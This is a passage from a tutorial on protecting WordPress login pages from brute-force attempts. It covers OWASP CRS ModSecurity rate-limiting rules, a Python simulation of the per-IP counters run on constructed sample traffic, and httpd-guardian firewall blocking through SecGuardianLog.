Regardless of authentication success or failure, you can also use persistent storage to track the number of authentication requests over a period of time. The OWASP ModSecurity Core Rule Set (CRS) includes rules for detecting this type of brute force authentication attack. In modsecurity_crs_10_setup.conf, adjust the following rule to specify the WordPress login page. Rule 981039 below tests REQUEST_FILENAME with @within against this variable, so it must hold the full path as Apache sees it (for the install shown above, /wordpress/wp-login.php rather than just /wp-login.php):

#
# -- [[ Brute Force Protection ]] ---------------------------------------------------------
#
# If you are using the Brute Force Protection rule set, then uncomment the following
# lines and set the following variables:
# - Protected URLs: resources to protect (e.g. login pages) - set to your login page
# - Burst Time Slice Interval: time interval window to monitor for bursts
# - Request Threshold: request # threshold to trigger a burst
# - Block Period: temporary block timeout
#
SecAction \
  "id:'900014', \
  phase:1, \
  t:none, \
  setvar:'tx.brute_force_protected_urls=/wordpress/wp-login.php', \
  setvar:'tx.brute_force_burst_time_slice=60', \
  setvar:'tx.brute_force_counter_threshold=10', \
  setvar:'tx.brute_force_block_timeout=300', \
  nolog, \
  pass"

Once this is set, you activate the modsecurity_crs_11_brute_force.conf file with the following rules:

#
# Anti-Automation Rule for specific Pages (Brute Force Protection)
# This is a rate-limiting rule set and does not directly correlate whether the
# authentication attempt was successful or not.
#
#
# Enforce an existing IP address block and log only 1-time/minute
# We don't want to get flooded by alerts during an attack or scan so
# we are only triggering an alert once/minute.  You can adjust how often
# you want to receive status alerts by changing the expirevar setting below.
#
SecRule IP:BRUTE_FORCE_BLOCK "@eq 1" "chain,phase:1,id:'981036',block,msg:'Brute Force Attack Identified from %{tx.real_ip} (%{tx.brute_force_block_counter} hits since last alert)',setvar:ip.brute_force_block_counter=+1"
	SecRule &IP:BRUTE_FORCE_BLOCK_FLAG "@eq 0" "setvar:ip.brute_force_block_flag=1,expirevar:ip.brute_force_block_flag=60,setvar:tx.brute_force_block_counter=%{ip.brute_force_block_counter},setvar:ip.brute_force_block_counter=0"
#
# Block and track # of requests but don't log
SecRule IP:BRUTE_FORCE_BLOCK "@eq 1" "phase:1,id:'981037',block,nolog,setvar:ip.brute_force_block_counter=+1"
#
# skipAfter Checks
# There are different scenarios where we don't want to do checks -
# 1. If the user has not defined any URLs for Brute Force Protection in the 10 config file
# 2. If the current URL is not listed as a protected URL
# 3. If the current IP address has already been blocked due to high requests
# In these cases, we skip doing the request counts.
#
SecRule &TX:BRUTE_FORCE_PROTECTED_URLS "@eq 0" "phase:5,id:'981038',t:none,nolog,pass,skipAfter:END_BRUTE_FORCE_PROTECTION_CHECKS"
SecRule REQUEST_FILENAME "!@within %{tx.brute_force_protected_urls}" "phase:5,id:'981039',t:none,nolog,pass,skipAfter:END_BRUTE_FORCE_PROTECTION_CHECKS"
SecRule IP:BRUTE_FORCE_BLOCK "@eq 1" "phase:5,id:'981040',t:none,nolog,pass,skipAfter:END_BRUTE_FORCE_PROTECTION_CHECKS"
#
# Brute Force Counter
# Count the number of requests to these resources
#
SecAction "phase:5,id:'981041',t:none,nolog,pass,setvar:ip.brute_force_counter=+1"
#
# Check Brute Force Counter
# If the request count exceeds tx.brute_force_counter_threshold, we increment the
# burst counter (which expires after tx.brute_force_burst_time_slice seconds) and
# reset the request counter
#
SecRule IP:BRUTE_FORCE_COUNTER "@gt %{tx.brute_force_counter_threshold}" "phase:5,id:'981042',t:none,nolog,pass,setvar:ip.brute_force_burst_counter=+1,expirevar:ip.brute_force_burst_counter=%{tx.brute_force_burst_time_slice},setvar:!ip.brute_force_counter"
#
# Check Brute Force Burst Counter and set Block
# Check the burst counter - if greater than or equal to 2, then we set the IP
# block variable for tx.brute_force_block_timeout seconds and issue an alert.
#
SecRule IP:BRUTE_FORCE_BURST_COUNTER "@ge 2" "phase:5,id:'981043',t:none,log,pass,msg:'Potential Brute Force Attack from %{tx.real_ip} - # of Request Bursts: %{ip.brute_force_burst_counter}',setvar:ip.brute_force_block=1,expirevar:ip.brute_force_block=%{tx.brute_force_block_timeout}"
SecMarker END_BRUTE_FORCE_PROTECTION_CHECKS
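The two counters above, the per-IP failed-login counter (rule 999323) and the CRS request-burst logic (rules 981036 to 981043), are easier to reason about when replayed over a known stream of requests. The following is an added example, not code from the original post or from ModSecurity/CRS: it emulates a ModSecurity ip collection in memory (integer variables with expirevar-style expiry) and runs both rule sets over constructed sample traffic. The IP addresses, timings and thresholds are assumptions chosen to match the tx.* settings shown above.

```python
# Added example: an offline model of two ModSecurity counters, not code from
# the original post or from ModSecurity/CRS. IPs, timings and thresholds are
# assumptions; the traffic in sample_events() is constructed, not captured.
from dataclasses import dataclass

LOGIN_PATH = "/wordpress/wp-login.php"   # REQUEST_FILENAME of the login page
PROTECTED_URLS = (LOGIN_PATH,)           # tx.brute_force_protected_urls
BURST_TIME_SLICE = 60                    # tx.brute_force_burst_time_slice
COUNTER_THRESHOLD = 10                   # tx.brute_force_counter_threshold
BLOCK_TIMEOUT = 300                      # tx.brute_force_block_timeout
FAILED_AUTH_LIMIT = 5                    # "@gt 5" in rule 999323
FAILED_AUTH_TTL = 60                     # expirevar:ip.failed_auth_attempt=60


class IpCollection:
    """Emulates one persistent 'ip' collection: integer variables with optional expiry."""

    def __init__(self):
        self.vars = {}  # name -> [value, expires_at or None]

    def get(self, name, now):
        entry = self.vars.get(name)
        if entry is None:
            return 0
        if entry[1] is not None and now >= entry[1]:
            del self.vars[name]          # expirevar reached: the variable is gone
            return 0
        return entry[0]

    def incr(self, name, now, ttl=None):  # setvar:ip.x=+1 [, expirevar:ip.x=ttl]
        value = self.get(name, now) + 1
        expires = now + ttl if ttl is not None else self.vars.get(name, [0, None])[1]
        self.vars[name] = [value, expires]
        return value

    def set(self, name, value, now, ttl=None):  # setvar:ip.x=value, expirevar:ip.x=ttl
        self.vars[name] = [value, now + ttl if ttl is not None else None]

    def unset(self, name):                # setvar:!ip.x
        self.vars.pop(name, None)


@dataclass
class Event:
    t: int                       # seconds since the start of the (constructed) capture
    ip: str                      # REMOTE_ADDR
    method: str
    path: str                    # REQUEST_FILENAME
    user: str = ""               # ARGS:log
    status: int = 200            # RESPONSE_STATUS
    login_failed: bool = False   # body contains "<strong>Error</strong>: Incorrect password."


def failed_auth_check(col, ev):
    """Rule 999323 (phase 4): count admin login failures per IP, block past the limit."""
    if (ev.method == "POST" and ev.path == LOGIN_PATH and ev.user == "admin"
            and ev.status == 200 and ev.login_failed):
        if col.incr("failed_auth_attempt", ev.t, ttl=FAILED_AUTH_TTL) > FAILED_AUTH_LIMIT:
            return "block"
    return "allow"


def brute_force_check(col, ev):
    """CRS 981036-981043: rate-limit protected URLs whether or not the login succeeded."""
    if col.get("brute_force_block", ev.t) == 1:
        return "block"                                  # 981036 / 981037 (phase 1)
    if ev.path not in PROTECTED_URLS:
        return "allow"                                  # 981039: not a protected URL
    if col.incr("brute_force_counter", ev.t) > COUNTER_THRESHOLD:        # 981041 / 981042
        bursts = col.incr("brute_force_burst_counter", ev.t, ttl=BURST_TIME_SLICE)
        col.unset("brute_force_counter")
        if bursts >= 2:                                                  # 981043
            col.set("brute_force_block", 1, ev.t, ttl=BLOCK_TIMEOUT)
    return "allow"   # phase 5 only sets the flag; the block starts with the next request


def run(events):
    """Replay events in order, one ip collection per client; returns one verdict per event."""
    collections, verdicts = {}, []
    for ev in events:
        col = collections.setdefault(ev.ip, IpCollection())
        verdict = brute_force_check(col, ev)
        if verdict == "allow":           # a phase 1 block never reaches WordPress
            verdict = failed_auth_check(col, ev)
        verdicts.append(verdict)
    return verdicts


def sample_events():
    """Constructed traffic (not captured data) exercising both mechanisms."""
    evs = []
    for i in range(25):   # A: bot hammering the admin account, one failed POST per second
        evs.append(Event(i, "10.0.0.9", "POST", LOGIN_PATH, "admin", 200, True))
    for i in range(25):   # B: scanner fetching the login page without submitting credentials
        evs.append(Event(100 + i, "10.0.0.5", "GET", LOGIN_PATH))
    evs.append(Event(200, "192.0.2.10", "POST", LOGIN_PATH, "admin", 200, True))  # C: one typo
    evs.append(Event(201, "192.0.2.10", "POST", LOGIN_PATH, "admin", 302))        # C: then success
    evs.append(Event(430, "10.0.0.5", "GET", LOGIN_PATH))   # D: scanner returns after the block expired
    return evs
```

Calling run(sample_events()) shows the difference between the two mechanisms: the bot submitting failed admin logins is blocked from its sixth failure within 60 seconds onward (the phase 4 rule), while the scanner that never submits credentials is only caught by the burst logic, after it exceeds the counter threshold twice within one time slice, and is admitted again once the 300-second block has expired. The real user who mistypes once is never touched by either counter.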

Brute Force Detection using SecGuardianLog

Another option that can be used to detect both DoS and Brute Force attacks is to use the SecGuardianLog directive:

Description: Configures an external program that will receive the information about every transaction via piped logging.

Syntax: SecGuardianLog |/path/to/httpd-guardian

Example Usage: SecGuardianLog |/usr/local/apache/bin/httpd-guardian

Scope: Main

Version: 2.0.0

Guardian logging is designed to send the information about every request to an external program. Because Apache is typically deployed in a multiprocess fashion, which makes information sharing between processes difficult, the idea is to deploy a single external process to observe all requests in a stateful manner, providing additional protection.

Currently the only tool known to work with guardian logging is httpd-guardian, which is part of the Apache httpd tools project http://apache-tools.cvs.sourceforge.net/viewvc/apache-tools/apache-tools/. The httpd-guardian tool is designed to defend against denial of service attacks. It uses the blacklist tool (from the same project) to interact with an iptables-based (on a Linux system) or pf-based (on a BSD system) firewall, dynamically blacklisting the offending IP addresses. It can also interact with SnortSam http://www.snortsam.net. Assuming httpd-guardian is already configured (look into the source code for the detailed instructions), you only need to add one line to your Apache configuration to deploy it:

SecGuardianLog |/path/to/httpd-guardian

With this setting in place, the httpd-guardian process tracks the number of requests hitting resources and, if the limits are exceeded, can execute a number of response actions:

# If defined, execute this command when a threshold is reached
# block the IP address for one hour.
# $PROTECT_EXEC = "/sbin/blacklist block %s 3600";
# $PROTECT_EXEC = "/sbin/samtool -block -ip %s -dur 3600 snortsam.example.com";
my $PROTECT_EXEC;

# For testing only:
# $PROTECT_EXEC = "/sbin/blacklist-webclient %s 3600";

# Max. speed allowed, in requests per
# second, measured over an 1-minute period
my $THRESHOLD_1MIN = 2; # 120 requests in a minute

Notice that the $PROTECT_EXEC variable lets you specify an action, such as telling a local or remote firewall to block the offending IP address. This is preferable to layer-7 IP blocking within ModSecurity because it is less resource intensive: once the firewall rule is in place, the attacker's packets never reach Apache at all.

Conclusion

Hopefully the ModSecurity rule examples shown here can help you to defend your WordPress sites from brute force attacks.